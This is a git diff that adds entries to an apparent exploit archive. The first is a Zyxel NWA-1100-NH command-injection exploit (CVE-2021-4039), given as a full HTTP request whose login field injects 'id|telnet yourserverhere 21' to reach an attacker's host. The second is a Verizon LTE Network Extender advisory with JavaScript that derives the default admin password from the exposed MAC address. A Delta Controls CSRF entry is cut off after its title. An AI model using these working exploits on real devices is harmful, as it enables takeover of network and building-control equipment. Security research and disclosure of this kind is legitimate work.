diff --git a/exploits/hardware/remote/50870.txt b/exploits/hardware/remote/50870.txt new file mode 100644 index 000000000..fbc5b8a41 --- /dev/null +++ b/exploits/hardware/remote/50870.txt @@ -0,0 +1,28 @@ +# Exploit Title: Zyxel NWA-1100-NH - Command Injection +# Date: 12/4/2022 +# Exploit Author: Ahmed Alroky +# Vendor Homepage: https://www.zyxel.com/homepage.shtml +# Version: ALL BEFORE 2.12 +# Tested on: Linux +# CVE : CVE-2021-4039 +# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf , +https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml + + +HTTP Request : + +POST /login/login.html HTTP/1.1 +Host: IP_address:8081 +Content-Length: 80 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http:/IP_address:8081 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://IP_address:8081/login/login.html +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + +myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login \ No newline at end of file diff --git a/exploits/hardware/remote/50875.txt b/exploits/hardware/remote/50875.txt new file mode 100644 index 000000000..044d6566c --- /dev/null +++ b/exploits/hardware/remote/50875.txt @@ -0,0 +1,67 @@ +Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm +Exploit Author: LiquidWorm + + +Vendor: Verizon Communications Inc. +Product web page: https://www.verizon.com +Affected version: GA4.38 - V0.4.038.2131 + +Summary: An LTE Network Extender enhances your indoor and 4G +LTE data and voice coverage to provide better service for your +4G LTE mobile devices. It's an extension of our 4G LTE network +that's placed directly in your home or office. The LTE Network +Extender works with all Verizon-sold 4G LTE mobile devices for +4G LTE data service and HD Voice-capable 4G LTE devices for voice +service. This easy-to-install device operates like a miniature +cell tower that plugs into your existing high-speed broadband +connection to communicate with the Verizon wireless network. + +Desc: Verizon's 4G LTE Network Extender is utilising a weak +default admin password generation algorithm. The password is +generated using the last 4 values from device's MAC address +which is disclosed on the main webUI login page to an unauthenticated +attacker. The values are then concatenated with the string +'LTEFemto' resulting in something like 'LTEFemtoD080' as the +default Admin password. + +Tested on: lighttpd-web + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5701 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php + + +17.02.2022 + +-- + + +snippet:///Exploit +// +// Verizon 4G LTE Network Extender Super Awesome JS Exploit +// + +console.log("Calling 'isDefaultPassword' API"); +let req = new Request("/webapi/isDefaultPassword"); +let def = req.url; + +const doAjax = async () => { + const resp = await fetch(def); + if (resp.ok) { + const jsonyo = await resp.json(); + return Promise.resolve(jsonyo); + } else { + return Promise.reject("Smth not rite captain!"); + } +} +doAjax().then(console.log).catch(console.log); + +await new Promise(t => setTimeout(t, 1337)); + +console.log("Verizon Admin Password: "); +let mac = document.querySelector("#mac_address").innerHTML; +console.log("LTEFemto" + mac.substr(-4)); \ No newline at end of file diff --git a/exploits/hardware/remote/50878.html b/exploits/hardware/remote/50878.html new file mode 100644 index 000000000..47afbadac --- /dev/null +++ b/exploits/hardware/remote/50878.html @@ -0,0 +1,78 @@ +# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) +# Exploit Author: LiquidWorm + + + +